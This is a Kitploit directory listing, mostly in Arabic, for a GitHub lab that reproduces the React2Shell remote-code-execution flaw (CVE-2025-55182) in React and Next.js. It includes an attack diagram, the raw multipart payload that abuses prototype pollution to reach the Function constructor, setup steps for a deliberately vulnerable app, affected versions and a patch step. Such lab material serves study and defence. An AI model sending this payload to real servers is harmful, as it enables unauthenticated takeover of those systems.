Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
react-rce — قمنا بكتابة واختبار عينة لثغرة CVE-2025-55182 مع الذكاء الاصطناعي. | Kitploit
أدوات/GitHubGitHub/randarts/react-rce
أطر الاستغلالتحليل الثغرات الأمنيةاستغلال تطبيقات الويبالتعلم والتعليمتطوير الحمولاتمختبرات وتدريب عملي
GitHubrandarts/react-rce

react-rce

قمنا بكتابة واختبار عينة لثغرة CVE-2025-55182 مع الذكاء الاصطناعي.

عرض المستودع
منذ 8 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-55182 تدريب عملي على ثغرة React2Shell

الذكاء الاصطناعي المستخدم: Claude Opus 4.5 ⚠️ تحذير: هذه البيئة مخصصة لأغراض تعليمية وبحثية فقط.

نظرة عامة على الثغرة

العنصرالمحتوى
CVECVE-2025-55182 (React) / CVE-2025-66478 (Next.js)
الاسمReact2Shell
CVSS10.0 (حرج)
النوعتنفيذ الأوامر عن بعد دون مصادقة
السببتلوث النموذج الأولي عند إلغاء تسلسل بروتوكول Flight

مبدأ الهجوم

root@kitploit:~
                    ┌─────────────────────────┐
                    │     Attacker            │
                    └───────────┬─────────────┘
                                │
                    POST Request + Next-Action Header
                    multipart/form-data payload
                                │
                                ▼
┌───────────────────────────────────────────────────────────┐
│                     Next.js Server                        │
├───────────────────────────────────────────────────────────┤
│  1. Next-Action 헤더 → Server Action 트리거                  │
│  2. multipart 페이로드 → Flight 프로토콜 역직렬화                │
│  3. Fake Chunk 객체의 then() 메서드 호출                       │
│  4. __proto__ 참조 → 프로토타입 오염                           │
│  5. Function 생성자 주입 → RCE                               │
└───────────────────────────────────────────────────────────┘

هيكل حمولة الاستغلال

root@kitploit:~
POST / HTTP/1.1
Next-Action: x
Content-Type: multipart/form-data; boundary=----Boundary

------Boundary
Content-Disposition: form-data; name="0"

{"_response":{"_formData":{"get":"Function"}},"then":"$1:__proto__:then"}
------Boundary
Content-Disposition: form-data; name="1"

$@0
------Boundary--

العناصر الأساسية:

  • تشغيل Server Action عبر رأس Next-Action
  • الحقل 0: قطعة مزيفة تحتوي على الطريقة then لمحاكاة سلوك الكائن الواعد
  • الحقل 1: تجول سلسلة النموذج الأولي عبر مرجع $@0
  • الوصول إلى منشئ الدالة Function عبر __proto__:then

بدء سريع

root@kitploit:~
cd vulnerable-app

# 의존성 설치
npm install

# 개발 서버 시작
npm run dev

الوصول عبر http://localhost:3000


هيكل الدليل

root@kitploit:~
react-rce/
├── README.md
├── vulnerable-app/          # 취약한 Next.js 앱
│   ├── package.json         # Next.js 15.0.3 (취약 버전)
│   └── app/
│       ├── page.js          # UI (CVE 정보 + RCE 시연)
│       ├── actions.js       # Server Actions
│       └── globals.css
└── exploit/                 # 공격 도구 (선택)
    └── exploit.py           # CVE-2025-55182 PoC

الإصدارات المتأثرة

  • React: 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • Next.js: 15.x, 16.x (عند استخدام App Router)
  • الحزمة: react-server-dom-webpack, react-server-dom-turbopack

طرق الدفاع

root@kitploit:~
# 패치 버전으로 업그레이드
npm install [email protected] [email protected] [email protected]

مراجع

  • إعلان أمان Next.js
  • GitHub: assetnote/react2shell-scanner
  • GitHub: freeqaz/react2shell
تنزيل الأداة